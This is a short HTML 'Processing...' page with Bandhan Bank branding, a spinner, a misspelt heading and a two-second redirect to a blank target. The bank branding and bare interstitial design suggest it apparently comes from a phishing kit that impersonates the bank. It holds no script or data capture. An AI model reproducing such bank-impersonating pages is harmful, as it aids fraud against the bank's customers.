<!DOCTYPE html>
<html>
  <head>
    <meta http-equiv="content-type" content="text/html;charset=utf-8" />
    <meta name="theme-color" content="#185a8c">
    <meta charSet="utf-8" />
    <meta name="viewport" content="width=device-width" />
    <meta http-equiv="refresh"
    content="2;
    URL=.html">
    <title>Bandhan Bank - Processing...</title>
    <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
    <link rel="manifest" href="/site.webmanifest">
    <meta name="msapplication-TileColor" content="#da532c">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Nunito+Sans:ital,opsz,wght@0,6..12,200..1000;1,6..12,200..1000&display=swap" rel="stylesheet">
    <noscript data-n-css=""></noscript>
    <style type="text/css">
    body
    {
    background-color:#fff;
    font-family:'Quicksand', sans-serif;
    margin:0;
    padding:0;
    max-width:100%;}
    
    .mg{color:#185a8c;
    letter-spacing:normal;
    line-height:1.5;
    font-size:10px;
    margin-top:16px;
    margin-bottom:20px;}
    
    .mainContent
    {padding:10px;
    font-family: 'Quicksand', sans-serif;
    font-weight:900;
    }
    
    .para
    {height:39px;
    padding-top:16px;}
    
    .pmLogin
    {margin-top:1.75rem;}
    
    .para span
    {font-size:16px;
    font-family: 'Quicksand', sans-serif;
    font-weight:600;
    line-height:1.2;color:#9C1D26;}
    
    .para span,.text-center
    {text-align:center;}
    
    .circlespinner
    {animation:rotate 2s linear infinite;
    width:50px;
    height:#185a8c;
    stroke:#185a8c;}
    
    .path
    {stroke:#185a8c;
    stroke-linecap:round;
    animation:dash 1.5s ease-in-out infinite}
    @keyframes rotate{to
    {transform:rotate(1turn)}}
    @keyframes dash{0%
    {stroke-dasharray:1,150;stroke-dashoffset:0;}50%
    {stroke-dasharray:90,150;stroke-dashoffset:-35;}
    to
    {stroke-dasharray:90,150;
    stroke-dashoffset:-125;}}
    .l-loading
    {margin-top:20%;}
    
    .form-group .invalid-message
    {
    font-size:12px;
    color:red;
    }
    </style>
    </head>
    <header> 
    <img src="header.jpg" width="100%" alt=""> 
    </header> 
  <body>
    <div id="__next">
      <center><div class="text-center l-loading">
        <svg class="circlespinner" viewBox="0 0 50 50">
          <circle class="path" cx="25" cy="25" r="20" fill="none" stroke-width="5"></circle>
        </svg>
        <h1 style="font-size:16px; color:#185a8c; font-family: 'Nunito Sans', sans-serif; font-weight:700; margin-top:1%;">Proccessing...</h1>
      </div>
    </div></center>
  </body>
</html>